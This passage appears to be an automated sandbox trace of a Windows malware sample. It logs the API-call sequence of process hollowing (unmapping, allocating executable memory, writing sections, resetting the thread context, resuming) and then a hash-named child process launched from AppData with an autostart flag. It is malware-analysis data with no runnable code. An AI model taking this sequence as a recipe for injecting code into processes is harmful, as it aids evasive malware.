FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498550, Ebp=0x0, Eip=0x773101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0169.791] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0169.791] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0169.891] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0169.899] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x25415a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x25415a0*, NumberOfBytesWritten=0x0) returned 0x0 [0169.916] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x25419a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x25419a0*, NumberOfBytesWritten=0x0) returned 0x0 [0169.949] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x260bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x260bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0169.971] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x2649ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x2649ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0169.983] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x264ffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x264ffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0169.995] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x26501a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x26501a0*, NumberOfBytesWritten=0x0) returned 0x0 [0170.022] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x25416ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x25416ec*, lpNumberOfBytesWritten=0x0) returned 1 [0170.023] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x773101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0170.023] ResumeThread (hThread=0x74) returned 0x1 [0170.080] CloseHandle (hObject=0x74) returned 1 [0170.080] CloseHandle (hObject=0x78) returned 1 [0170.080] ExitProcess (uExitCode=0x0) [0170.080] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f07d0 | out: hHeap=0x2f0000) returned 1 Process: id = "11" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0xec60000" os_pid = "0x7dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fdbe" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1869 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1870 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1871 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1872 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1873 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1874 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1875 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 1876 start_va = 0x77120000 end_va = 0x772c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1877 start_va = 0x77300000 end_va = 0x7747ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1878 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1879 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1880 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1881 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1882 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1883 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1884 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1885 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1886 start_va = 0x1a0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1887 start_va = 0x73a90000 end_va = 0x73acefff monitored = 0 entry_point = 0x73abe088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1888 start_va = 0x73a30000 end_va = 0x73a8bfff monitored = 0 entry_point = 0x73a6f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1889 start_va = 0x73a20000 end_va = 0x73a27fff monitored = 0 entry_point = 0x73a220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1890 start_va = 0x76f00000 end_va = 0x7701efff monitored = 0 entry_point = 0x76f15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1891 start_va = 0x75cd0000 end_va = 0x75ddffff monitored = 0 entry_point = 0x75ce3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1892 start_va = 0x76f00000 end_va = 0x7701efff monitored = 0 entry_point = 0x76f15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1893 start_va = 0x76f00000 end_va = 0x7701efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076f00000" filename = "" Region: id = 1894 start_va = 0x77020000 end_va = 0x77119fff monitored = 0 entry_point = 0x7703a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1895 start_va = 0x77020000 end_va = 0x77119fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077020000" filename = "" Region: id = 1896 start_va = 0x540000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1897 start_va = 0x75cd0000 end_va = 